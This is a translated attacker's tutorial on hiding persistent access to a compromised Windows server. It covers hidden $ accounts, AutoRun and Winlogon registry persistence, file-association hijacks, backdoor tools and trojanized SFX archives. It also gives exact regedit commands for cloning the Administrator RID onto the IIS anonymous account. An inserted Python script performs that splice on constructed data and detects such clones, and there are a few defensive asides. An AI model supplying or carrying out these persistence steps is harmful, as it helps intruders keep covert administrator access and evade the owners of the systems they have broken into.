This article shows how an attacker who has gained access to a Windows server keeps that access hidden. The approaches below are ones I have used and summarized from practice; which one fits depends on the situation. In general, these are the methods used to stay hidden on a server:
1. Clone an account with superdoor, but it has a bug. Rong Ge's ca clone tool depends on IPC$, which is not ideal.
2. Create a hidden account whose name ends in $ (for example count$). net user does not list it, but it still shows up under Computer Management -> Users, an unknown account appears under My Computer -> Properties -> User Profiles, and a folder named count$ is created under Documents and Settings. Not particularly good: it was discovered and removed on three or more of my machines.
3. Write a guest.vbs that, when run, creates an account or activates the Guest or TsInternetUser account, and import a prepared value under the Winlogon key of the registry (HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon) so that guest.vbs runs at startup and recreates the ghost account.
Alternatively, import the following into the registry (in a .reg file backslashes inside string values are doubled):
[HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor]
"AutoRun"="C:\\Program Files\\guest.vbs"
The AutoRun value of the Command Processor key is executed every time cmd.exe starts, so the account is recreated whenever anyone opens a command prompt. This key is a well-known persistence point; when investigating a machine, start the prompt with cmd /d, which skips AutoRun, and inspect the value.
4. Change the association of .txt files to our executable, as the Glacier trojan did: opening a text file runs our program.
5. Configure a startup script or run item in Group Policy.
6. Set a file association so that the VBS runs whenever Notepad, or some other common program, is opened.
7. Plant a backdoor such as hackdefender, hacksdoor, winshell, or Wuhan boys. These are easily detected and removed by antivirus; without modification they are almost useless. If one is not caught, well... hey!
8. Replace a commonly used program with a WinRAR self-extracting archive that contains both the original EXE and our own program (a WinRAR SFX is not a binder, so it is not flagged). When it runs, it also carries out steps 3, 4 and 5.
9. While searching I found hideadmin, a good tool: with administrator rights it hides users whose names end in $. This is awesome! They cannot be found from the command line, in the management interface, or in User Profiles. One word: strong! For a long time I had no idea how to remove it, so let it stay. Another author also has a similar tool.
10. Replace the Telnet or Terminal Services (termsvc) service with another service of your own, or create a new one.
11. Manually clone an account in the registry and hide it. A seemingly cool method circulates on the Internet. In my test on Windows 2000 Server, however, the Domains or Account key did not exist at all, perhaps because the machine was not in a domain, so the clone could not be found. (Note for practitioners: by default the SAM\SAM subkey is readable only by SYSTEM, so an Administrator opening regedit sees it as empty; running regedit as SYSTEM, for example from a scheduled task or with psexec -s, shows the keys.)
But let me go into detail:
In Windows 2000 and Windows NT the built-in Administrator account always has RID 500 (0x1F4), the last component of its SID. So we take an existing account on the machine and clone the RID 500 account onto it; here we pick IUSR_MachineName, the IIS anonymous account, because it attracts little attention.
At the command prompt:
regedit /e admin.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
This exports the Administrator account (RID 500). Edit admin.reg and change its third line,
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]
so that the trailing 1F4 becomes the RID of IUSR_MachineName. On most machines this is 0x3E9 (1001), but if IIS was not part of the initial installation and other accounts were created before IIS, it may be a different value; check the subkeys under Users for the actual RID. Then export that account's own key:
regedit /e iusr.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003E9
Copy everything from "V"=hex: to the end of iusr.reg and use it to replace the corresponding V section of admin.reg, so that admin.reg now holds the Administrator's F value under the IUSR key path together with IUSR's own V value. Import it with regedit /s admin.reg and run net user IUSR_MachineName password to set the account's password. OK, all done!
The IUSR_MachineName account now has Administrator authority, yet neither net.exe nor Users and Groups in Computer Management shows any trace of it; even its group memberships look exactly as they did before the change.
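As an added check for the clone just described (this is the editor's example, not code from the article), the following Python parses a regedit /e export of a Users\<RID> key, performs the same F/V splice the article does by hand, and then detects the result: in a SAM user key the F value is a fixed-size record whose RID field is the little-endian DWORD at offset 0x30, so a key named 000003E9 whose F record says 0x1F4 is a clone. The two exports used here are constructed stand-ins (real V values carry the account name, SID and password hashes; these do not).

```python
import re

# Offset of the account RID inside a SAM user "F" record (documented SAM layout).
F_RID_OFFSET = 0x30

ADMIN_KEY = r'HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4'
IUSR_KEY = r'HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003E9'


def parse_reg(text):
    """Parse a regedit /e export into {key_path: {value_name: bytes}}.

    Only hex: (REG_BINARY) values are decoded, since F and V are what matter
    here; the ",\\" continuation lines regedit writes are joined back together."""
    keys, current, pending = {}, None, None
    for raw in text.splitlines():
        line = raw.strip()
        if pending is not None:                       # inside a wrapped hex value
            pending[1] += line.rstrip('\\')
            if not line.endswith('\\'):
                name, hexstr = pending
                keys[current][name] = bytes.fromhex(re.sub(r'[,\s]', '', hexstr))
                pending = None
            continue
        if line.startswith('[') and line.endswith(']'):
            current = line[1:-1]
            keys[current] = {}
            continue
        m = re.match(r'"([^"]+)"=hex:(.*)$', line)
        if m and current is not None:
            name, rest = m.groups()
            if rest.endswith('\\'):
                pending = [name, rest.rstrip('\\')]
            else:
                keys[current][name] = bytes.fromhex(re.sub(r'[,\s]', '', rest))
    return keys


def f_rid(f_value):
    """RID recorded inside an F value."""
    return int.from_bytes(f_value[F_RID_OFFSET:F_RID_OFFSET + 4], 'little')


def find_clones(keys):
    """Return [(rid_from_key_name, rid_from_F)] for every Users\\<RID> key whose
    F record names a different RID than the key itself. An empty list is clean."""
    findings = []
    for path, values in keys.items():
        m = re.search(r'\\Users\\([0-9A-Fa-f]{8})$', path)
        if m and 'F' in values:
            key_rid = int(m.group(1), 16)
            if f_rid(values['F']) != key_rid:
                findings.append((key_rid, f_rid(values['F'])))
    return findings


def reg_text(key, f, v):
    """Render one user key the way regedit /e does: header, [key], wrapped hex values."""
    def wrap(name, data):
        parts = [f'{b:02x}' for b in data]
        lines, line = [], f'"{name}"=hex:'
        for i, p in enumerate(parts):
            line += p + (',' if i < len(parts) - 1 else '')
            if len(line) > 70 and i < len(parts) - 1:
                lines.append(line + '\\')
                line = '  '
        lines.append(line)
        return lines
    return '\r\n'.join(['Windows Registry Editor Version 5.00', '', f'[{key}]',
                        *wrap('F', f), *wrap('V', v), ''])


def build_clone_reg(admin_reg, target_reg):
    """The splice the article does by hand: target's key path and V, Administrator's F."""
    (_, admin_vals), = parse_reg(admin_reg).items()
    (target_path, target_vals), = parse_reg(target_reg).items()
    return reg_text(target_path, admin_vals['F'], target_vals['V'])


def constructed_f_record(rid):
    """Constructed stand-in for a real F value: 0x50 zero bytes with only the RID set."""
    f = bytearray(0x50)
    f[F_RID_OFFSET:F_RID_OFFSET + 4] = rid.to_bytes(4, 'little')
    return bytes(f)


# Constructed sample exports; real V values hold the name, SID and hashes, these do not.
ADMIN_REG = reg_text(ADMIN_KEY, constructed_f_record(0x1F4), b'constructed-admin-V' * 3)
IUSR_REG = reg_text(IUSR_KEY, constructed_f_record(0x3E9), b'constructed-iusr-V' * 3)


if __name__ == '__main__':
    clone = build_clone_reg(ADMIN_REG, IUSR_REG)
    print('before:', find_clones(parse_reg(IUSR_REG)))   # []
    print('after: ', find_clones(parse_reg(clone)))      # [(1001, 500)]
```

On a real machine, run as SYSTEM, regedit /e of HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users exports every user subkey at once; feeding that file to find_clones lists each account whose F record was borrowed from another RID, which is exactly what net user and Computer Management cannot show.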
The above is an introduction to the methods attackers use to hide themselves once they are on a server. I hope you find it useful.